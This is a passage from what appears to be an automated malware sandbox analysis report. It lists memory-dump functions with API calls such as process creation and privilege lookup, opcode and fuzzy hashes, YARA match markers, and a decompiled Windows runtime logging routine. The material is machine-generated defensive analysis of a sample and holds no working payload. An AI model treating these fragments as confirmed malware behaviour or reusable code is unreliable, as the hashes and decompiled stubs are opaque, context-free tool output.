                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                    • Instruction ID: d83f740c03f74f682f22fec89e7940fbeec405475c91f9b6f3c0ba4d4cdb30bb
                                                    • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                    • Instruction Fuzzy Hash: BB011EB5D4020DBBDF10DBE4ED42FDDB7789B54318F104195E90897281F631EB548B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A1A0A3, Relevance: 1.5, APIs: 1, Instructions: 46processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: c7b6a700f07a7a7c6a9bdc57f5028ac86590a87da9f292f9caa407c86771859d
                                                    • Instruction ID: 72dc9bda1e848bbe4475726515785268e3229ad1a942d91ec1ad550a1a611309
                                                    • Opcode Fuzzy Hash: c7b6a700f07a7a7c6a9bdc57f5028ac86590a87da9f292f9caa407c86771859d
                                                    • Instruction Fuzzy Hash: 7701CCB2201108AFCB58CF98CC81EEB77A9AF8C350F158218BA0DA3251C630E8418BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A1A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction ID: 7ef9e247f95564df5f45d12d45a49afacd9048b6b68a6515a4baa5f968e2f5c0
                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                    • Instruction Fuzzy Hash: 0701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A1A175, Relevance: 1.5, APIs: 1, Instructions: 29processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A134
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateInternalProcess
                                                    • String ID:
                                                    • API String ID: 2186235152-0
                                                    • Opcode ID: 744a41d26b75ddabc06fe888323c601f13b5f58476db9ccee4552cbbd2dd9abe
                                                    • Instruction ID: 98874e4665cfcf9f0ba99ea863320b1d0d85638a916e2ebadd1893ae4491973d
                                                    • Opcode Fuzzy Hash: 744a41d26b75ddabc06fe888323c601f13b5f58476db9ccee4552cbbd2dd9abe
                                                    • Instruction Fuzzy Hash: 33E052B6214009AF9B04DF99ED90CEB73AEABDC754B118609FA5DD3240D630E8528BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A1A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1A2,00A0F1A2,?,00000000,?,?), ref: 00A1A200
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction ID: f5c3544ed91ef2d24587d43be846afe849fdf93a118d2fc7de9c7f17c7c99641
                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                    • Instruction Fuzzy Hash: 72E01AB12002086BDB10DF49CC85EE737ADEF88650F018154BA0C67241C930E8508BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A0F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008003,?,00A08CF4,?), ref: 00A0F6CB
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                    • Instruction ID: eb5debf9b7bc6dbb13cf5fe6720a6e0cbb7f85945f1ecdb0305ad7c9f9e3ee41
                                                    • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                    • Instruction Fuzzy Hash: BBD0A7717903083BE610FBA89C03F6632CD6B44B00F490074FA48E73C3D950E4004165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 032B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 65ff83dc5778772190838898e0027d0fadf41a4d7415c9ae6cba4c2f86c96596
                                                    • Instruction ID: a1f699410c52c09d2ba44c7d6c32ba34929f6b6d8fefbaf2b55cb7667f0efcde
                                                    • Opcode Fuzzy Hash: 65ff83dc5778772190838898e0027d0fadf41a4d7415c9ae6cba4c2f86c96596
                                                    • Instruction Fuzzy Hash: 7EB09B719114C5C5D711D7704608717791477D0741F26C166D2020681A4778D5D1F5B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0330FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E0330FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E032BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03305720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03305720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                    0x0330fdda
                                                    0x0330fde2
                                                    0x0330fde5
                                                    0x0330fdec
                                                    0x0330fdfa
                                                    0x0330fdff
                                                    0x0330fe0a
                                                    0x0330fe0f
                                                    0x0330fe17
                                                    0x0330fe1e
                                                    0x0330fe19
                                                    0x0330fe19
                                                    0x0330fe19
                                                    0x0330fe20
                                                    0x0330fe21
                                                    0x0330fe22
                                                    0x0330fe25
                                                    0x0330fe40

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0330FDFA
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0330FE01
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0330FE2B
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.908612300.0000000003250000.00000040.00000001.sdmp, Offset: 03250000, based on PE: true
                                                    • Associated: 00000010.00000002.908744201.000000000336B000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                    • API String ID: 885266447-3903918235
                                                    • Opcode ID: e028c1b69d9ba5ab3c5c249bd32d35828195c9ff2d535edb65a1477a77b44a97
                                                    • Instruction ID: f417f5cc530f7f2280fceff338c241ad346b8dbb45f4f32a189de0c925c00a7b
                                                    • Opcode Fuzzy Hash: e028c1b69d9ba5ab3c5c249bd32d35828195c9ff2d535edb65a1477a77b44a97
                                                    • Instruction Fuzzy Hash: 54F0F636604301BFE6209A45DC46F23BB6AEB45B30F140314F6285A5E1DA62F8A0D6F0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%